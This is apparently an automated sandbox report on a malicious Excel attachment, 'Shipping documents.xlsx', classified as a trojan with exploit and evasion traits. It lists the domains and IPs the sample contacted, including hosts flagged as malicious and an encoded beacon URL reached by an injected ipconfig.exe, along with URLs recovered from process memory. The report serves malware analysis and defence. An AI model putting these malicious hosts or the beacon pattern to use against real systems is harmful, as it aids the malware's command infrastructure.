          antillean-network.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.bigdillenergy.com0%Avira URL Cloudsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.bigdillenergy.com/sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj0%Avira URL Cloudsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://www.bigdillenergy.com/0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.moveoneic.com
          66.96.162.138
          truetrue
            unknown
            nziyade.com
            92.42.39.29
            truetrueunknown
            antillean-network.com
            85.10.195.227
            truetrueunknown
            www.coloringprintouts.com
            52.58.78.16
            truetrue
              unknown
              parking.namesilo.com
              192.161.187.200
              truefalse
                high
                www.bigdillenergy.com
                52.58.78.16
                truetrue
                  unknown
                  www.mondzorg-postma.com
                  188.93.150.44
                  truetrue
                    unknown
                    shops.myshopify.com
                    23.227.38.74
                    truetrue
                      unknown
                      ktproductreviews.com
                      66.235.200.146
                      truetrue
                        unknown
                        www.yanasacha.com
                        160.124.66.42
                        truetrue
                          unknown
                          target.clickfunnels.com
                          104.16.16.194
                          truefalse
                            high
                            www.nziyade.com
                            unknown
                            unknowntrue
                              unknown
                              www.cocogreensoil.com
                              unknown
                              unknowntrue
                                unknown
                                www.gregoryrecommends.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.integratednourishment.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.ktproductreviews.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.antillean-network.com
                                      unknown
                                      unknowntrue
                                        unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.bigdillenergy.com/sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHfljtrue
                                        • Avira URL Cloud: safe
                                        unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.bigdillenergy.comipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://search.ebay.de/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.mtv.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://www.rambler.ru/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://buscar.ya.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://asp.usatoday.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://rover.ebay.comexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.ebay.in/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://%s.comexplorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      low
                                                                      http://msk.afisha.ru/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2135887620.0000000002341000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://search.rediff.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://search.naver.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.google.ru/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://search.daum.net/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://buscar.ozu.es/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.about.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.ask.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.cjmall.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://search.centrum.cz/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://suche.t-online.de/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.google.it/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://search.auction.co.kr/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.ceneo.pl/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.amazon.de/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2156461233.00000000082FD000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://sads.myspace.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://search.sify.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.ebay.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.nifty.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.google.si/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.google.cz/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.soso.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.univision.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.ebay.it/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://busca.orange.es/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.target.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.iask.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.tesco.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.interpark.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://investor.msn.com/explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://search.espn.go.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.bigdillenergy.com/ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://service2.bfast.com/explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown

                                                                                                                                                                        Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        52.58.78.16
                                                                                                                                                                        unknownUnited States
                                                                                                                                                                        16509AMAZON-02UStrue
                                                                                                                                                                        66.235.200.146
                                                                                                                                                                        unknownUnited States
                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                        85.10.195.227
                                                                                                                                                                        unknownGermany
                                                                                                                                                                        24940HETZNER-ASDEtrue
                                                                                                                                                                        66.96.162.138
                                                                                                                                                                        unknownUnited States
                                                                                                                                                                        29873BIZLAND-SDUStrue
                                                                                                                                                                        216.170.126.121
                                                                                                                                                                        unknownUnited States
                                                                                                                                                                        36352AS-COLOCROSSINGUStrue
                                                                                                                                                                        160.124.66.42
                                                                                                                                                                        unknownSouth Africa
                                                                                                                                                                        132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                                                                                        188.93.150.44
                                                                                                                                                                        unknownNetherlands
                                                                                                                                                                        49685SIGNET-ASSignetBVNLtrue
                                                                                                                                                                        92.42.39.29
                                                                                                                                                                        unknownTurkey
                                                                                                                                                                        49467EUROTA-ASNEUROTAINTERNETSERVICESLTDTRtrue
                                                                                                                                                                        23.227.38.74
                                                                                                                                                                        unknownCanada
                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                        192.161.187.200
                                                                                                                                                                        unknownUnited States
                                                                                                                                                                        8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                                                                                        104.16.16.194
                                                                                                                                                                        unknownUnited States
                                                                                                                                                                        13335CLOUDFLARENETUSfalse

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                        Analysis ID:323357
                                                                                                                                                                        Start date:26.11.2020
                                                                                                                                                                        Start time:21:11:49
                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 9m 38s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:light
                                                                                                                                                                        Sample file name:Shipping documents.xlsx
                                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                        Number of analysed new started processes analysed:9
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • HDC enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSX@9/6@11/11
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HDC Information:
                                                                                                                                                                        • Successful, ratio: 26.5% (good quality ratio 25.6%)
                                                                                                                                                                        • Quality average: 72.1%
                                                                                                                                                                        • Quality standard deviation: 27.9%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 96%
                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                        • Found application associated with file extension: .xlsx
